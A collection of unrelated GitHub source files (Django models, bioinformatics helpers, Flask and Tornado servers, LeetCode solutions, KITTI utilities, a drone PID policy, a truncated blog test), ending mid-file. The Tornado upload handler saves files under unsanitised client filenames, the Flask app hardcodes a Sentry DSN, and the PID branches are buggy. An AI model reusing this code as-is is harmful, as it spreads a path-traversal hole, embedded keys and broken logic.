and `std::simd`.\n 6. 1.33.0 -> 1.35.0 18780 new APIs add `default` before `fn`. In 1.35.0, lots are removed and go back to normal.\n 6. 1.47.0 -> 1.48.0 `pub` is added into pub functions, though it is not needed, just for format.\n 6. 1.51.0 -> 1.52.0 `pub` is now removed, though it is not needed, just for format.\n 6. 1.56.0 -> 1.57.0 Abourt 3000 APIs in `core::simd::Simd` and another 3000 in `std::simd::Simd` are introduced. \n 6. 1.57.0 -> 1.58.0 Abourt 3000 APIs in `core::simd::Simd` and another 3000 in `std::simd::Simd` are removed. About 1200 APIs in `std::ops::xx` changed their types slightly.\n'''","repo_name":"SocialistDalao/rustdoc_parser","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":16947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12615944553","text":"\"\"\"\nUseful django models for implementing XBlock infrastructure in django.\n\"\"\"\n\n\nimport logging\nimport warnings\n\nimport opaque_keys.edx.django.models\nfrom django.db import models\n\nfrom xmodule.modulestore.django import modulestore\n\nlog = logging.getLogger(__name__)\n\n\nclass NoneToEmptyManager(models.Manager):\n \"\"\"\n A :class:`django.db.models.Manager` that has a :class:`NoneToEmptyQuerySet`\n as its `QuerySet`, initialized with a set of specified `field_names`.\n \"\"\"\n def get_queryset(self):\n \"\"\"\n Returns the result of NoneToEmptyQuerySet instead of a regular QuerySet.\n \"\"\"\n return NoneToEmptyQuerySet(self.model, using=self._db)\n\n\nclass NoneToEmptyQuerySet(models.query.QuerySet):\n \"\"\"\n A :class:`django.db.query.QuerySet` that replaces `None` values passed to `filter` and `exclude`\n with the corresponding `Empty` value for all fields with an `Empty` attribute.\n\n This is to work around Django automatically converting `exact` queries for `None` into\n `isnull` queries before the field has a chance to convert them to queries for it's own\n empty value.\n \"\"\"\n def _filter_or_exclude(self, *args, **kwargs):\n for field_object in self.model._meta.get_fields():\n direct = not field_object.auto_created or field_object.concrete\n if direct and hasattr(field_object, 'Empty'):\n for suffix in ('', '_exact'):\n key = f'{field_object.name}{suffix}'\n if key in kwargs and kwargs[key] is None:\n kwargs[key] = field_object.Empty\n\n return super()._filter_or_exclude(*args, **kwargs)\n\n\nclass OpaqueKeyField(opaque_keys.edx.django.models.OpaqueKeyField):\n \"\"\"\n A django field for storing OpaqueKeys.\n\n The baseclass will return the value from the database as a string, rather than an instance\n of an OpaqueKey, leaving the application to determine which key subtype to parse the string\n as.\n\n Subclasses must specify a KEY_CLASS attribute, in which case the field will use :meth:`from_string`\n to parse the key string, and will return an instance of KEY_CLASS.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"openedx.core.djangoapps.xmodule_django.models.OpaqueKeyField is deprecated. \"\n \"Please use opaque_keys.edx.django.models.OpaqueKeyField instead.\", stacklevel=2)\n super().__init__(*args, **kwargs)\n\n\nclass CourseKeyField(opaque_keys.edx.django.models.CourseKeyField):\n \"\"\"\n A django Field that stores a CourseKey object as a string.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"openedx.core.djangoapps.xmodule_django.models.LocationKeyField is deprecated. \"\n \"Please use opaque_keys.edx.django.models.UsageKeyField instead.\", stacklevel=2)\n super().__init__(*args, **kwargs)\n\n\nclass UsageKeyField(opaque_keys.edx.django.models.UsageKeyField):\n \"\"\"\n A django Field that stores a UsageKey object as a string.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"openedx.core.djangoapps.xmodule_django.models.UsageKeyField is deprecated. \"\n \"Please use opaque_keys.edx.django.models.UsageKeyField instead.\", stacklevel=2)\n super().__init__(*args, **kwargs)\n\n\nclass UsageKeyWithRunField(opaque_keys.edx.django.models.UsageKeyField):\n \"\"\"\n Subclass of UsageKeyField that automatically fills in\n missing `run` values, for old Mongo courses.\n \"\"\"\n def to_python(self, value):\n value = super().to_python(value)\n if value is not None and value.run is None:\n value = value.replace(course_key=modulestore().fill_in_run(value.course_key))\n return value\n\n\nclass BlockTypeKeyField(opaque_keys.edx.django.models.BlockTypeKeyField):\n \"\"\"\n A django Field that stores a BlockTypeKey object as a string.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"openedx.core.djangoapps.xmodule_django.models.BlockTypeKeyField is deprecated. \"\n \"Please use opaque_keys.edx.django.models.BlockTypeKeyField instead.\", stacklevel=2)\n super().__init__(*args, **kwargs)\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/xmodule_django/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"24244655844","text":"import re\n\ndef readgenefile(round_table):\n \"\"\" Get the gene list \"\"\"\n try:\n with open(round_table, 'r') as f:\n genes = [line.split('\\t')[0] for line in f]\n genes = [s for s in genes if not s.startswith('gene_ID')]\n genes.sort()\n except IOError:\n print(\"Gene list file not found. Try again.\")\n genes = []\n return genes\n\ndef load_fastadb(target_genome):\n \"\"\" Read multiple fasta files of a database and make dictionary {gene_id : sequence} \"\"\"\n # read original fasta files\n d = {}\n header = str()\n seq = str()\n\n with open(target_genome, 'r') as f:\n for line in f:\n line = line.rstrip('\\n')\n if line[0] == '>': # a new sequence\n d[header] = seq \n header = line.replace('>', '')\n seq = str()\n else:\n seq += line\n \n d[header] = seq # the last sequence\n del d[''] # delete first empty element due to appending only\n return d\n\ndef findseq(genes, d):\n \"\"\" Find target sequences \"\"\"\n target_seqs = []\n\n for gene in genes:\n pattern = re.compile(gene)\n pattern_hit = [d[k] for k in d if pattern.search(k)]\n if len(pattern_hit) == 1:\n target_seqs.append(pattern_hit[0])\n elif len(pattern_hit) > 1:\n print(f'multiple entries found with {gene} in the target genome. use the shortest sequence.')\n target_seqs.append(min(pattern_hit)[0])\n else:\n print(f'No hit found with this gene ID: {gene}')\n\n return target_seqs","repo_name":"takaW496/PDTFP","sub_path":"my_module/load_db.py","file_name":"load_db.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3904589442","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/6/11 上午10:51\n# @Author : waitWalker\n# @Email : waitwalker@163.com\n# @File : MTTFileUploadHandler.py\n# @Software: PyCharm\n\nfrom Handlers import MTTBaseHandler\nimport tornado.web\nimport os\n\n\nclass MTTFileUploadHandler(MTTBaseHandler.MTTBaseHandler):\n\n # get请求方法\n def get(self, *args, **kwargs):\n msg = \"上传文件只支持post请求\"\n data = \"\"\n kwargs_ = {\"msg\": msg, \"data\": data}\n self.success_response(**kwargs_)\n\n # post请求\n def post(self, *args, **kwargs):\n # 文件暂存路径\n upload_path = os.path.join(os.path.dirname(__file__), 'files')\n # print(\"file path:\", upload_path)\n\n # print(\"file list:\", self.request.files)\n\n # 提取表单中'name'为file的文件元数据\n file_metas = self.request.files.get('file2', None)\n\n # print(\"file:\", self.request.files)\n\n # print(\"body\", self.request.body)\n\n file_path = ''\n\n if not file_metas:\n msg = \"文件上传失败\"\n data = \"\"\n kwargs_ = {\"msg\": msg, \"data\": data}\n self.success_response(**kwargs_)\n for meta in file_metas:\n filename = meta['filename']\n\n # print(\"file name:\", filename)\n\n file_path = os.path.join(upload_path, filename)\n # print(\"file full path:\", file_path)\n\n with open(file_path, 'wb') as up:\n up.write(meta['body'])\n # print(\"file update success path:\", file_path)\n\n msg = \"文件上传成功!\"\n data = {\"file_path\": file_path}\n self.success_response(msg=msg, data=data)\n\n\n\n\n\n\n\n\n\n","repo_name":"waitwalker/PetAPI","sub_path":"Handlers/MTTFileUploadHandler.py","file_name":"MTTFileUploadHandler.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"33422997706","text":"import os\nfrom flask import Flask\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nimport json\nfrom psycopg2 import connect\nimport sentry_sdk\nfrom sentry_sdk.integrations.flask import FlaskIntegration\n\nsentry_sdk.init(\n dsn=\"https://1ec8bc09682e478695b180119159a056@o4504179022692352.ingest.sentry.io/4504194406023168\",\n integrations=[\n FlaskIntegration(),\n ],\n\n # Set traces_sample_rate to 1.0 to capture 100%\n # of transactions for performance monitoring.\n # We recommend adjusting this value in production.\n traces_sample_rate=1.0,\n\n # By default the SDK will try to use the SENTRY_RELEASE\n # environment variable, or infer a git commit\n # SHA as release, however you may want to set\n # something more human-readable.\n # release=\"myapp@1.0.0\",\n)\n\napp = Flask(__name__)\napp.wsgi_app = ProxyFix(app.wsgi_app)\n\ndir = os.path.dirname(__file__)\nwith open(os.path.join(dir, 'db_credentials')) as data:\n db_credentials = json.load(data)\n\n@app.route(\"/\")\ndef index():\n conn = connect(\n dbname='postgres',\n user=db_credentials['username'],\n host=db_credentials['host'],\n password=db_credentials['password']\n )\n conn.close()\n return \"\"\"\n \n
Everything is working fine
\n \"\"\"\n\n@app.route(\"/error/\")\ndef error():\n conn = connect(\n dbname='postgres',\n user=db_credentials['username'],\n host=db_credentials['host'],\n password='asdf1234'\n )\n division_by_zero = 1 / 0\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80)","repo_name":"codnstj/awscloud101","sub_path":"cw-logs/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71604041683","text":"#!/usr/bin/env python\nimport signal\nimport os\nimport asyncio\nimport websockets\n\nuser = set()\nwall = set()\n\nasync def hello(websocket, path):\n message = await websocket.recv()\n if message == \"User\":\n user.add(websocket)\n print(\"User assigned\")\n if message == \"Wall\":\n wall.add(websocket)\n print(\"Wall assigned\")\n await websocket.send(message)\n\n while True:\n\n message = await websocket.recv()\n if websocket in user:\n message = \"User: \" + message\n if wall:\n websockets.broadcast(wall, message)\n else:\n websockets.broadcast(user, \"Wall not connected.\")\n print(\"Wall not connected.\")\n else:\n message = \"Non-user: \" + message\n\n print(message)\n #await websocket.send(message)\n\n\nasync def main():\n # Set the stop condition when receiving SIGTERM.\n loop = asyncio.get_running_loop()\n stop = loop.create_future()\n loop.add_signal_handler(signal.SIGTERM, stop.set_result, None)\n\n async with websockets.serve(\n hello,\n host=\"\",\n port=int(os.environ[\"PORT\"]),\n ):\n await stop\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"Bstrutt/LightboardSocketServer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"20334590200","text":"\"\"\"\n@Title: 162. Find Peak Element\n@Tag: array / binary search\n@Date: Jan-22 2020\n@Author: ceezyyy\n@Difficulty: Medium\n\"\"\"\n\n\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n # nums[-1] = nums[n] = -∞\n nums.insert(0, float(\"-inf\"))\n nums.insert(len(nums), float(\"-inf\"))\n for i in range(1, len(nums) - 1): # linear scan\n if nums[i] > nums[i-1] and nums[i] > nums[i+1]:\n return i - 1\n\n\n\"\"\"\nRuntime: 64 ms, faster than 7.76% of Python3 online submissions for Find Peak Element.\nMemory Usage: 12.6 MB, less than 100.00% of Python3 online submissions for Find Peak Element.\n\"\"\"\n\n\n\"\"\"\nTime Complexity: O(n)\nSpace Complexity: O(1)\n\"\"\"\n","repo_name":"ceezyyy/leetcode","sub_path":"others/Python3/162.Find Peak Element.py","file_name":"162.Find Peak Element.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"3"} +{"seq_id":"74976496401","text":"import os\nimport cv2\nimport glob\nimport torch\nimport random\nimport shutil\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nfrom dataset.detection.calibration import Calibration, draw_projected_box3d\n\nclass KITTI:\n def __init__(self, mnt_path, img_path, ratio=0.3):\n self.mnt_path = mnt_path\n self.img_path = img_path\n self.ratio = ratio\n\n def create_train_folder(self):\n if not(os.path.isdir(self.mnt_path + '/kit_train')):\n os.mkdir(self.mnt_path + '/kit_train')\n else:\n print('directory already exist!!')\n\n def create_valid_folder(self):\n if not(os.path.isdir(self.mnt_path + '/kit_valid')):\n os.mkdir(self.mnt_path+'/kit_valid')\n else:\n print('directory already exist!!')\n\n\n\n def split_valid_set(self):\n if not(os.path.exists(self.mnt_path + self.img_path)):\n print(\"Image Not Exist!!\")\n imgs_file = glob.glob((self.mnt_path+self.img_path) + '/*.png')\n random.shuffle(imgs_file)\n self.create_train_folder()\n self.create_valid_folder()\n train_set = imgs_file[:int(len(imgs_file) * self.ratio)]\n valid_set = imgs_file[int(len(imgs_file) * self.ratio):]\n\n for i in train_set:\n annot = i.replace(\"png\", \"txt\")\n shutil.copy(i, self.mnt_path + '/kit_train')\n shutil.copy(annot, self.mnt_path + '/kit_train')\n for i in valid_set:\n annot = i.replace(\"png\", \"txt\")\n shutil.copy(i, self.mnt_path + '/kit_valid')\n shutil.copy(annot, self.mnt_path + '/kit_valid')\n return \"Data split end!!\"\n\n \nclass Visualize3D:\n def __init__(self, img_path, annot_path, calib_path):\n self.image = cv2.imread(img_path)\n self.annot_df = self.read_annotation(annot_path)\n self.calib_path = calib_path\n self.calib = Calibration(self.calib_path)\n self.names = self.parse_name('/home/insig/3D_Pose_Estimation/dataset/detection/names/kitti.txt')\n self.color = self.gen_random_colors(self.names)\n\n def read_annotation(self, annot_path):\n df = pd.read_csv(annot_path, header=None, sep= ' ')\n df.columns = ['type', 'truncated', 'occluded', 'alpha', 'bbox_left', 'bbox_top',\n 'bbox_right', 'bbox_bottom', 'height', 'width', 'length', 'pos_x', 'pos_y', 'pos_z', 'rot_y']\n # df = df[df['type'] == 'Car']\n df.reset_index(drop=True, inplace=True)\n return df\n\n def gen_random_colors(self, names):\n colors = [(random.randint(0, 255),\n random.randint(0, 225),\n random.randint(0, 255)) for i in range(len(names))]\n return colors\n\n def parse_name(self, name_file):\n with open(name_file, 'r') as f:\n return f.read().splitlines()\n\n def visualize(self):\n for raws in range(len(self.annot_df)):\n name = self.annot_df.iloc[raws]['type']\n corner_3d_cam2 = self.compute_3d_box_cam2(*self.annot_df.loc[raws, ['height', 'width', 'length', 'pos_x', 'pos_y', 'pos_z', 'rot_y']])\n pts_2d = self.calib.project_rect_to_image(corner_3d_cam2.T)\n self.image = draw_projected_box3d(self.image, pts_2d, color=self.color[self.names.index(str(name))], thickness=1)\n # cv2.imwrite(\"visualize_image.png\", self.image)\n \n def compute_3d_box_cam2(self, h, w, l, x, y, z, yaw):\n \"\"\"\n Return : 3xn in cam2 coordinate\n \"\"\"\n R = np.array([[np.cos(yaw), 0, np.sin(yaw)], [0, 1, 0], [-np.sin(yaw), 0, np.cos(yaw)]])\n x_corners = [l/2,l/2,-l/2,-l/2,l/2,l/2,-l/2,-l/2]\n y_corners = [0,0,0,0,-h,-h,-h,-h]\n z_corners = [w/2,-w/2,-w/2,w/2,w/2,-w/2,-w/2,w/2]\n corners_3d_cam2 = np.dot(R, np.vstack([x_corners,y_corners,z_corners]))\n corners_3d_cam2 += np.vstack([x, y, z])\n return corners_3d_cam2\n\n\nclass Format_Change:\n def __init__(self, img_path, calib_path):\n self.images = glob.glob(img_path + '/*.png')\n self.calib_path = calib_path\n self.names = self.parse_name('/home/insig/3D_Pose_Estimation/dataset/detection/names/kitti.txt')\n\n def parse_name(self, name_file):\n with open(name_file, 'r') as f:\n return f.read().splitlines()\n\n def change_label_format(self, update_path):\n if not(os.path.isdir(update_path)):\n os.mkdir(update_path)\n else:\n print('directory already exist!!')\n\n for i in self.images: \n shutil.copy(i, update_path)\n\n new_annots = []\n\n annot_df = self.read_annotation_dframe(i.replace('png', 'txt'))\n calib_file = i.replace('png','txt').replace('image','kit_calib')\n calib = Calibration(calib_file)\n\n for raws in range(len(annot_df)):\n name = annot_df.iloc[raws]['type']\n rot = annot_df.iloc[raws]['rot_y']\n corner_3d_cam2 = self.compute_3d_box_cam2(*annot_df.loc[raws, ['height', 'width', 'length', 'pos_x', 'pos_y', 'pos_z', 'rot_y']])\n pts_2d = calib.project_rect_to_image(corner_3d_cam2.T)\n new_annot = str(self.names.index(name)) + ' ' + str((pts_2d[2][0] - pts_2d[3][0]) / 2) + ' ' + str((pts_2d[3][1] - pts_2d[7][1]) / 2) + ' ' + str((pts_2d[0][0] - pts_2d[3][0]) /2 ) + ' ' + str(pts_2d[2][0] - pts_2d[3][0])+ ' ' + str(pts_2d[3][1] - pts_2d[7][1])+ ' ' + str(pts_2d[0][0] - pts_2d[3][0])+ ' ' + str(rot)\n new_annots.append(new_annot)\n save_path = i.replace('png', 'txt')\n save_path = save_path.split('/')[-1]\n\n with open(update_path +'/'+save_path, 'w') as w:\n for label in new_annots:\n w.write(label + '\\n')\n\n def read_annotation_dframe(self, annot_file):\n df = pd.read_csv(annot_file, header=None, sep= ' ')\n df.columns = ['type', 'truncated', 'occluded', 'alpha', 'bbox_left', 'bbox_top',\n 'bbox_right', 'bbox_bottom', 'height', 'width', 'length', 'pos_x', 'pos_y', 'pos_z', 'rot_y']\n # df = df[df['type'] == 'Car']\n df.reset_index(drop=True, inplace=True)\n return df\n \n def compute_3d_box_cam2(self, h, w, l, x, y, z, yaw):\n R = np.array([[np.cos(yaw), 0, np.sin(yaw)], [0, 1, 0], [-np.sin(yaw), 0, np.cos(yaw)]])\n x_corners = [l/2,l/2,-l/2,-l/2,l/2,l/2,-l/2,-l/2]\n y_corners = [0,0,0,0,-h,-h,-h,-h]\n z_corners = [w/2,-w/2,-w/2,w/2,w/2,-w/2,-w/2,w/2]\n corners_3d_cam2 = np.dot(R, np.vstack([x_corners,y_corners,z_corners]))\n corners_3d_cam2 += np.vstack([x, y, z])\n return corners_3d_cam2\n \n\n\n \n\nif __name__ == \"__main__\":\n '''\n KITTI Dataset의 경우 Train과 Valid가 나누어져 있지 않아 작업 필요\n python -m dataset.detection.utils\n '''\n # visualize\n # vis_3D = Visualize3D(img_path='/mnt/kit_valid/000000.png', annot_path='/mnt/kit_valid/000000.txt', calib_path='/mnt/kit_calib/000000.txt')\n # vis_3D.visualize()\n\n #format change\n format_change = Format_Change(img_path='/mnt/image', calib_path='/mnt/kit_calib')\n format_change.change_label_format('/mnt/3d_format')","repo_name":"cvisionBot/3D_Object_Detection","sub_path":"dataset/detection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73526981521","text":"#!/usr/bin/env python3\n\n\"\"\"Get a cleaner version of a web page for reading purposes.\n\nThis script reads JSON input from the Mercury Web Parser \n(https://github.com/postlight/mercury-parser) and performs conversion of HTML \nto markdown and plain-text via html2text.\n\"\"\"\n\nimport sys\nimport json\nimport textwrap\n\nfrom datetime import datetime\nfrom html import unescape\nfrom html2text import HTML2Text\n\nclass Format():\n \"\"\"This is a decorator class for registering document format methods.\n \n You can register additional document formatter functions by decorating\n them with @Format.\n \n A formatter should be a function that takes as input a response object\n from the Mercury API. It's output can be any string derived from that\n input.\n \n By convention formatters should have a '_format' suffix in their function\n name. By this convention, if you have a formatter named 'json_format',\n then you can call this with Format.formatter['json']().\n \"\"\"\n formatter = {}\n def __init__(self, f):\n key, _ = f.__name__.rsplit('_', 1)\n self.formatter.update({key: f})\n self.format = f\n \n def __call__(self):\n self.format()\n\ndef format_date(obj):\n date = obj.get('date_published')\n if date is not None: \n obj['date_published'] = datetime.strptime(\n obj['date_published'],\n \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n\n@Format\ndef json_format(obj):\n \"\"\"Formatter that formats as JSON\"\"\"\n return json.dumps(obj, ensure_ascii=False)\n\n@Format\ndef md_format(obj):\n \"\"\"Formatter that formats as markdown\"\"\"\n format_date(obj)\n content = '''\n date: {date_published} \n author(s): {author} \n \n # [{title}]({url})\n '''\n return '\\n'.join((\n textwrap.dedent(content.format(**obj)),\n obj['content'].get('markdown', '')\n ))\n\n@Format\ndef txt_format(obj):\n \"\"\"Formatter that formats as plain-text\"\"\"\n format_date(obj)\n content = '''\n url: {url}\n date: {date_published}\n author(s): {author}\n \n {title}\n '''\n return '\\n'.join((\n textwrap.dedent(content.format(**obj)),\n obj['content'].get('text', '')\n ))\n\ndef load(filename):\n \"\"\"Load Mercury Web Parser JSON results from file as a Python dict\"\"\"\n try:\n if filename in {\"-\", None}:\n return json.loads(sys.stdin.read())\n with open(filename, mode='r') as f:\n return json.load(f)\n except json.JSONDecodeError:\n print(f'failed to load JSON from file: {filename}', file=sys.stderr)\n sys.exit(1)\n\ndef main(result, body_width):\n \"\"\"Convert Mercury parse result dict to Markdown and plain-text\n \n result: a mercury-parser result (as a Python dict)\n \"\"\"\n text = HTML2Text()\n text.body_width = body_width\n text.ignore_emphasis = True\n text.ignore_images = True\n text.ignore_links = True\n text.convert_charrefs = True\n markdown = HTML2Text()\n markdown.body_width = body_width\n markdown.convert_charrefs = True\n result['content'] = {\n 'html': result['content'],\n 'markdown': unescape(markdown.handle(result['content'])),\n 'text': unescape(text.handle(result['content']))\n }\n return result\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__\n )\n parser.add_argument(\n 'filename',\n help=(\n 'load Mercury Web Parser JSON result from file (use \"-\" '\n 'to read from stdin)'\n )\n )\n parser.add_argument(\n '-f', '--format',\n choices=list(Format.formatter),\n default='json',\n help='output format'\n )\n parser.add_argument(\n '-w', '--body-width',\n type=int,\n default=None,\n help='character offset at which to wrap lines for plain-text'\n )\n args = parser.parse_args()\n obj = main(\n load(args.filename),\n args.body_width,\n )\n print(Format.formatter[args.format](obj))\n","repo_name":"zyocum/reader","sub_path":"reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"3"} +{"seq_id":"42813691029","text":"from typing import List\n\n\nclass Solution:\n def grayCode(self, n: int) -> List[int]:\n res = []\n size = 1 << n\n for i in range(size):\n res.append((i >> 1) ^ i)\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.grayCode(2)\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Medium/89. Gray Code/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19909489664","text":"'''Austin Nguyen'''\n\n'''Class to represent a PID policy\n\nHas a bunch of different \"branches\" to distinguish the different kinds of policies we can make with PID outputs\nAttributes: has a bunch of initialized PIDs\n - __init__ takes in a mode and creates PIDs based on the mode that is given\nMethods:\n - chooseAction: outputs PWM inputs based on current state and PID list\n - update: updates the PIDs with given new states...has to be inputted in certain order\n\nAt the bottom, includes code using CrazyFlieSim.py to test given policy modes'''\n\nfrom PID import PID\nimport torch\nimport numpy as np\n\nclass policy():\n def __init__(self, policyDict):\n self.mode = policyDict['PolicyMode']\n self.PID = []\n self.numPIDs = 0\n self.min_pwm = policyDict['min_pwm']\n self.max_pwm = policyDict['max_pwm']\n self.equil = policyDict['Equil']\n self.dt = policyDict['dt']\n self.numParameters = 0\n parameters = policyDict['PID']\n #order: pitch, roll, yaw, pitchrate, rollrate, yawRate or pitch roll yaw yawrate for hybrid or pitch roll yaw for euler\n if self.mode == 'EULER':\n self.numParameters = 9\n elif self.mode == 'HYBRID':\n self.numParameters = 12\n elif self.mode == 'RATE' or self.mode == 'ALL':\n self.numParameters = 18\n assert len(parameters) == self.numParameters\n self.numPIDs =int(self.numParameters / 3)\n\n for i in [3 * i for i in list(range(self.numPIDs))]:\n self.PID += [PID(0, parameters[i], parameters[i + 1], parameters[i + 2], 1000, self.dt)]\n\n\n def chooseAction(self):\n def limit_thrust(PWM): #Limits the thrust\n return np.clip(PWM, self.min_pwm, self.max_pwm)\n output = [0,0,0,0]\n #PWM structure: 0:front right 1:front left 2:back left 3:back right\n '''Depending on which PID mode we are in, output the respective PWM values based on PID updates'''\n if self.mode == 'EULER':\n output[0] = limit_thrust(self.equil[0] - self.PID[0].out + self.PID[1].out + self.PID[2].out)\n output[1] = limit_thrust(self.equil[1] - self.PID[0].out - self.PID[1].out - self.PID[2].out)\n output[2] = limit_thrust(self.equil[2] + self.PID[0].out - self.PID[1].out + self.PID[2].out)\n output[3] = limit_thrust(self.equil[3] + self.PID[0].out + self.PID[1].out - self.PID[2].out)\n elif self.mode == 'HYBRID':\n output[0][0] = limit_thrust(self.equil[0] - self.PID[0].out + self.PID[1].out + self.PID[5].out)\n output[0][1] = limit_thrust(self.equil[1] - self.PID[0].out - self.PID[1].out - self.PID[5].out)\n output[0][2] = limit_thrust(self.equil[2] + self.PID[0].out - self.PID[1].out + self.PID[5].out)\n output[0][3] = limit_thrust(self.equil[3] + self.PID[0].out + self.PID[1].out - self.PID[5].out)\n elif self.mode == 'RATE': #update this with the signs above\n output[0][0] = limit_thrust(self.equil[0] + self.PID[3].out - self.PID[4].out + self.PID[5].out)\n output[0][1] = limit_thrust(self.equil[1] - self.PID[3].out - self.PID[4].out - self.PID[5].out)\n output[0][2] = limit_thrust(self.equil[2] - self.PID[3].out + self.PID[4].out + self.PID[5].out)\n output[0][3] = limit_thrust(self.equil[3] + self.PID[3].out + self.PID[4].out - self.PID[5].out)\n elif self.mode == 'ALL': #update this with the signs above\n output[0][0] = limit_thrust(self.equil[0] + self.PID[0].out - self.PID[1].out + self.PID[2].out + self.PID[3].out - self.PID[4].out + self.PID[5].out)\n output[0][1] = limit_thrust(self.equil[1] - self.PID[0].out - self.PID[1].out - self.PID[2].out - self.PID[3].out - self.PID[4].out - self.PID[5].out)\n output[0][2] = limit_thrust(self.equil[2] - self.PID[0].out + self.PID[1].out + self.PID[2].out - self.PID[3].out + self.PID[4].out + self.PID[5].out)\n output[0][3] = limit_thrust(self.equil[3] + self.PID[0].out + self.PID[1].out - self.PID[2].out + self.PID[3].out + self.PID[4].out - self.PID[5].out)\n return torch.FloatTensor(output)\n\n def update(self, states):\n '''Order of states being passed: pitch, roll, yaw'''\n '''Updates the PID outputs based on the states being passed in (must be in the specified order above)'''\n '''Order of PIDs: pitch, roll, yaw, pitchRate, rollRate, yawRate'''\n assert len(states) == 3\n EulerOut = [0,0,0]\n for i in range(3):\n EulerOut[i] = self.PID[i].update(states[i])\n if self.mode == 'HYBRID':\n self.PID[3].update(EulerOut[2])\n if self.mode == 'RATE' or self.mode == 'ALL':\n for i in range(3):\n self.PID[i + 3].update(EulerOut[i])\n","repo_name":"austinnguyen517/dynamicsPID","sub_path":"PID/PIDPolicy.py","file_name":"PIDPolicy.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18008878233","text":"'''\n输入两个递增排序的链表,合并这两个链表并使新链表中的节点仍然是递增排序的。\n\n示例1:\n输入:1->2->4, 1->3->4\n输出:1->1->2->3->4->4\n限制:\n\n0 <= 链表长度 <= 1000\n'''\n\n\"\"\"解题思路:\n根据题目描述, 链表l1, l2是 递增 的,因此容易想到使用双指针 l1和 l2遍历两链表,根据 l1.val和 l2.val 的大小关系确定节点添加顺序,两节点指针交替前进,直至遍历完毕。\n\n引入伪头节点: 由于初始状态合并链表中无节点,因此循环第一轮时无法将节点添加到合并链表中。解决方案:初始化一个辅助节点 dumdum 作为合并链表的伪头节点,将各节点添加至 dumdum 之后。\n\n算法流程:\n初始化: 伪头节点 dum ,节点 cur 指向 dum 。\n循环合并: 当l1或l2为空时跳出;\n当l1.valA Web Page
\\r\\n\\r\\n"Test publishing a blog post."
\\r\\n'\n tag_type1, tt1 = TagType.objects.get_or_create(title='Region', id=34, code='CENSUS_REGION')\n tag1, t1 = Tag.objects.get_or_create(title='Pacific', tag_type_id=tag_type1.id, code='PACIFIC')\n tag_type1.tags.add(tag1)\n add_tag = ContentTagType(content=bpost, tag_type=tag_type1)\n # do we need to attach the ContentTagType to the content?\n add_tag.save()\n bpost.contenttagtype.add(add_tag)\n add_tag.tags.add(tag1)\n add_tag.save()\n\n bpost.taxo_topics.add(self.ttt)\n mem_grp, mg = Group.objects.get_or_create(name='member')\n bpost.permission_groups.add(mem_grp)\n\n today = timezone.now().date()\n bpost.save()\n bpost.publish()\n bpost_all = BlogPost.objects.filter(title='New Blog Post')\n bpost_draft = BlogPost.objects.get(title='New Blog Post', publish_status='DRAFT')\n bpost_published = BlogPost.objects.get(title='New Blog Post', publish_status='PUBLISHED')\n\n resp_code = bpost_draft.solr_publish()\n self.assertEqual(resp_code, 200)\n solr_bpost_draft_rec = SolrSearch(custom_q='id:CONTENT.%s' % bpost_draft.master_id)\n res = solr_bpost_draft_rec.get_results()\n vals_dict = res[\"response\"][\"docs\"][0]\n\n bpost_draft.save()\n bpost_published.save()\n dr = bpost_draft\n pu = bpost_published\n self.assertEqual(dr.title, pu.title)\n self.assertEqual(dr.master, pu.master)\n self.assertEqual(dr.content_type, pu.content_type)\n self.assertEqual(dr.content_area, pu.content_area)\n # self.assertEqual(dr.section, pu.section)\n self.assertEqual(dr.text, pu.text)\n self.assertEqual(dr.resource_published_date, today)\n self.assertEqual(pu.resource_published_date, today)\n\n # special case of dealing with solr date format with a blog\n now = timezone.now()\n cut_time = timedelta(hours=now.hour, minutes=now.minute, seconds=now.second)\n now_zero = now - cut_time\n nowu = force_utc_datetime(now_zero)\n nowu_str = str(nowu)\n 